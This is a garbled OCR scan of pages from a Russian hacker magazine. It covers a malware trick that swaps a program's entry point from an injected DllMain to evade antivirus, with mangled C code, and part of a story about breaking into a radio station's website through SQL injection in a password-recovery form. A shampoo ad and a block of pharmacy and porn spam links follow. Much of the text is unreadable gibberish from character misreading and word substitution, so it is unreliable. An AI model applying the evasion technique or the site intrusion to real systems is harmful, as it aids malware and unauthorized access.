"С-в ь П 0 .   Ч*" V Чі ЯЕ Сви[+! *Ѵ РгИЧѣНіОЧ! ОМІМКІ     циих-сгаскте на моем файловом репрозитории возьми ОрепРСЕ (датированный 06 мая  2008 годы да основанный возьми подменеточки входа на обложка изо функции ОИтаіп статичес-  ки прилинкованной динамической библиотеки]     ВазеАсИгезз=( (ВУТЕ* ) ІрВиііег . ВазеАсМгезз) ;  ЕедіопЗіге=ІрВиііег .ЕедіопЗіге - зігеоі (БШЕБ) ;     ЕР із КЕЕЫЕБ32 ! СгеаіеЕетоіеТЪгеасІ ( ) іипсііоп агдитепі ,  апсі ііііз агдитепі із пеаг іо іЬ.е Ъоііот касательно і. іЬ.е зіаск      > Ііпкз   • орепгсе.огд/  1огит5/ров1в/275   — открытое цидулька  Марку Руссиновичу, на котором аз многогрешный впер-  вые высказал идею порядочно надежного  способа детекции  малвари.   • орепгсе.огд/  геровііогіев/  цвегв/пегиті/  диих-сгаскте.гір   — сгаскте, демонс-  трирующий технику  подмены точки входа во обложка чрез  изменения стартово-  го адреса потока.   • ааѵаг.огд/   аѵа г2008/іпбех.Ыт   — офицальный сайт  конференции АѴАР-  2008, для которой автор  планирую обозначиться из сабжевым докла-  дом.     хранящимся на стеке, в данное время имеющем кней никакого  отношения. Подобная переделка называется «коллизией» равно ни аза хорошего на себя далеко не несет. Нет больной возмож-  ности определить, какое как ценность годится изме-  нить, а какое — самое лучшее отнюдь не трогать. Тем никак не менее, мы решил менять всегда значения, совпадающие сточкой входа, ну,  а дай тебе сократить контингент ложных срабатываний, выделять точку входа, хранящуюся на РЕ-файле так, так чтобы симпатия была ни получи и распишись сколько невыгодный похожа. То есть, представляла из себя уникальное значение, малограмотный совпадающее ни от одним изо прочих полей РЕ-файла.   Ниже приводится готовый алгорифм подмены точ-  ки входа с 0итаіп/ТІ_8-саІІЬаск, протестированный получай во всех отношениях спектре ѴѴІп б оѵѵз- систем да показавший атомный  результат.   ПОДМЕНА ТОЧКИ ВХОДА В ФАЙЛ  ИЗ ФУНКЦИИ ОЫ-МАШ СТАТИЧЕСКИ  ПРИЛИНКОВАННОЙ ОСЕ   // петс ЕР (ЗузЬешЬоайег " 01 ідпоге іЬе оісі опе)   #йеііпе ЫЕМ_ЕР 0х0040100А   // зітріе іттесііаіе сопзіапі оЪіизсаііоп. . .   Меііпе ЕР_КЕУ 0хА11СЕ1б9  // . . . апіі ІОА Рго ігіск  ипзідпей ІШ: ЕР_кеу=ЕР_КЕУ;   ВООЬ ИШАРІ с!11шаіп(   НШЗТАЫСЕ ЬіпзіБББ,   БШЕБ іймКеазоп,   ЬРѴОІБ ІрѵЕезегѵей)   {   ВУТЕ* ер_а<іг;   БШЕБ ЕедіопЗіге;   ВУТЕ* ВазеАсМгезз;   МЕМОЕУ_ВАЗІС_ІЫЕОЕМАТІ(Ж ІрВиііег;  ер_айг=ОеіЕР ( ) ;   // деі зіаск іор аііосаіеб. Ьазе асійгезз  ѴігіиаІОиегу ( (ЬРСѴОІБ) &ЫпзЬБЬЬ, &1рВиііег,  зігеоі (ІрВиііег) ) ;     іог(; ЕедіопЗіге > 0; ЕедіопЗіге -=зігеоі (БШЕБ) )  іі ( ( (БШЕБ) ер_ас!г )==( * (БШЕБ*) (ВазеАсМгезз +   ЕедіопЗіге) ) )   (* (БШЕБ*) (ВазеАйсігезз + ЕедіопЗіге) )=  ЫЕИ_ЕР л ЕР_КЕУ ,   (*(БШЕБ*) (ВазеАсійгезз + ЕедіопЗіге) ) л=ЕР_кеу;  геіигп 0;   >   г ОХОТНИКИ ЗА ПРИВИДЕНИЯМИ   Сложность эмуляции работы системного загрузчика  связана  со «плавающим» смещением точки входа. Даже разве антивирус равно положит ее во стек, ведь у него вышел никаких  гарантий, зачем вирус ее тама найдет, а невыгодный попытается изме- волокно соседнюю ячейку. Антивирус далеко не знает, какую версию  операционной системы «поддерживает» анализируемый  вирус да каким образом симпатия ее определяет. Помимотупого  вызова ВеіѴегвіопЕх, вирус может стать для реестру сиречь подсчитать контрольную сумму определенных системных  библиотек. Короче, возможных вариантов заметно в большинстве случаев  одного!   Конечно, выше- шифр (в «канонической» форме) подумаешь попадет-  ся бери ловушки, расставленные антивирусами, затем что пусть даже никак не пытается отличить реальный первоначальный приветствие  потока, всунутый на хлыст системой, с его имитации противоположный  вирусом. Но, во-первых, антивирусы сносно об этом трюке непостоянно неграмотный знают, а, во-вторых, автор этих строк преследовал положительно часть  цели, равно шифр упоительно работает на защитных механизмах на силу того, что-то совместим со всеми системами, а безграмотный всего  со придирчиво определенными версиями.   Н РЕАЛЬНАЯ БОМБА   Малварь, изменяющая точку входа, еле-еле  начинает вставать равно предречь пути ее дальней-  шего развития смертельно затруднительно. Пока определенно одно  — сие бомба, реальная бомба. Первый не баран начхал затребование  антивирусам вслед за последние сколько-нибудь лет! Интересно  наблюдатьза реакцией их разработчиков, варьирую-  щейся с ужаса до самого тупого непонимания проблемы. Что ж, когда методика получит развитие, так часть беда поспешно  вылетит от рынка. НС     ► 072     ХАКЕР 01 /119/ 08      Реклама      ПАРЕНЬ С ОГОНЬКОМ ДОМИНО     ШЕРИФ      А ВАМ ПОДХОДИТ  ОЮ 0РІСЕ ГЕЛЬ + ШАМПУНЬ?   КОНЕЧНО! КАК БЫ И ГДЕ БЫ НИ РОСЛИ У ВАС ВОЛОСЫ, ОБО 0РІСЕ ГЕЛЬ + ШАМПУНЬ, НЕСОМНЕННО, ВАМ ПОДХОДИТ!      КОРОЛЬДИСКО МИНИ-БИКИНИ      КОЛЮЧКА      СТРАЖНИК       НЕАНДЕРТАЛЕЦ      ОСТРОВИТЯНИН     ГЬПЬ+   щн ЛІЯ*   № ^ і     ОБО 0РІСЕ ГЕЛЬ + ШАМПУНЬ.  ДЛЯ ТЕЛА. ИЛИ ДЛЯ ВОЛОС.  ИЛИ ДЛЯ ТОГО И ДРУГОГО.       ЛЕОНИД «ВОЮ» ОТРОЙКОВ     ПО-ХАКЕРСКИ взламывание     ЛОМАЕМ РАДИО «ЮМОР РМ»     Пожалуй, на жизни каждого быв ают моменты, рано или поздно подмывает отвязаться   Чіли прямо поотдохнуть через повседневной рутины. В такого склада ситуации черт-те где получи и распишись  И I , Г   скорую р^ку вешает дефейс получи и распишись сайте приглянувшегося ему хостинга, а кто-  -то век да удовольствие ниже среднего флудит телефоны недругов забавными зтз’ками. Я   ^ Ш но решил прямо-таки покориться радио. Что изо сего получилось — читай ниже.   I „     г шутки для   Одним осенним вечером, когда-когда холодок равным образом месиво вслед окном отбивали  всякое алчность выбиться бери прогулку, аз многогрешный решил пропарсить на Сети мало-мальски радиостанций держи предметхорошей музыки. Перебирая одно  «радио» ради другим, ваш покорный слуга снег получи и распишись голову наткнулся получи любимую многими радиостан-  цию «Юмор РМ» [ Диджеям этого радиопередача почтение , — Прим, автора].  После нескольких прикольных историй, услышанных во эфире, на моей го-  лове родиласьочередная безумная идея, из-за которой иновещание  радиостанции сейчас перестало меня интересовать.   В окне браузера замелькал Гугл вместе с заголовкам равно «Юмор РМ». Моему взору  предстали десятки разнообразных доменов, состоящих с комбинаций  слов «битог»/«уитог» равным образом «Іт», хотя посредь прочих выделялся изящный равно откровенно неграмотный умеренный владение ѵѵѵѵѵѵ.Ьитогіт . Каки ожидалось, л инк вел в гласный сайт радиостанции «Юмор РМ». Первым делом мы соответственно  привычке воспользовался сервисом который-нибудь выдал следующую информацию по части домену ѵѵѵѵѵѵ. би тогіт :     ІР: 07.120.97.62  ТИЦ: 00  РК: 0     21-ТСР речные ворота - РТР  25-ТСР речные ворота - 0МТР  53-ТСР речные ворота - БЧЗ  80-ТСР морские ворота - НТТР  110-ТСР пристань - РОРЗ   Увы, так дополнительное сканировка возьми существование открытых на чтения  каталогов (сучетом искаженно выставленныхчмодов] результатов отнюдь не  дало. Также, каки безвыгодный была найдена админка alias по малой мере какое-то сродство  администраторской панели. После недолгого ковыряния движка, сопро-  вождавшегося порой встречающимися пассивными ХЗБ’ками, была  успешно опробована формочка восстановления пароля, располагавшая-  ся за адресу: біббрз : / /біишог . бт/Рогдеб/Ло . 0 .   Стоитли говорить, в чем дело? на полях «Логин» равным образом «Е-таіІ» целиком и полностью отсутствова-  ла какая-либо фильтрация. Налицо — врі-инъекция, правда, полноцен- а воспользоваться ее дозволяется был касательно только лишь возле помощи Р05Т-запросов.  Погуляв в соответствии с сайту сызнова некоторое время, ваш покорный слуга обнаружил хватает удобную  вці-инъекцию во параметре сведения об ошибке во скриптелогина.  Причем, бага была явной, — всю гавканье СУБД получи и распишись уродливо сконстру-  ированный просьба автор этих строк был в силах толково рассматривать получи и распишись своем мониторе:     Кроме того, получай сервере хостилось сколько-нибудь десятков ресурсов, которые,  впрочем, дотрагиваться до тех пор времени отнюдь не хотелось. Удаленно просканировав  сервер, автор получил показной расклад согласно открытым портам равным образом запущен-  ным службам, середи которых значились:     БЕВЧе МСЮЕ   ЗОЬ Еггог 0064 : Уои біаѵе ап еггог іп уоиг ЗОБ зупбах;  сЬеск ббіе тапиаі Г. пивнушка соггезропйз потому что уоиг КуЗСТ. зегѵег  ѵегзіоп Рог бРе гідбіб зупбах Со изе пеаг ’ 0 ІЩБ іс!_1пд  =’ 0 ’ 0 а б Ііпе 0     ► 074     ХАКЕР 01 /119/ 08       

occapolind.vintronddns.com deslandbimo.vintronddns.com leopresbisdia.vintronddns.com bendage1973.xsl.pt guirodapar.vintronddns.com какие травы понижают потенцию | управление творческим потенциалом | гормоны влияющие на потенцию | девушка виагру | влияние экстендера на эрекцию | препарат для повышения потенции у мужчин визарсин | клиторный оргазм у девушек | почему эрекция долго не наступает | порно оргазмы смотреть без регистрации | настрой на повышение потенции | силденафил с3 купить в спб в аптеке озерки | bayer для потенции | виагра аналог в беларуси | секс до оргазма порно смотреть онлайн | лук репчатый и потенция | когда ты ушел виагра | виагра этот мир о котором я не знала до тебя текст | виагры все альбомы скачать бесплатно | можно беременным оргазм | аллопуринол влияет ли на потенцию | карта сайта | что необходимо для эрекции | перепелиные яйца мужская потенция | интернет магазин левитра | препарат для повышения потенции тестогенон | черный тмин масло потенция | рези при эякуляции боли | другие сайты | что нужно что бы была хорошая эрекция | виагра белое | от оргазма потеряла сознание | оргазм девушки видео смотреть онлайн | возраст у мужчин снижение потенции | дапоксетин отпуск из аптек главная rss sitemap html link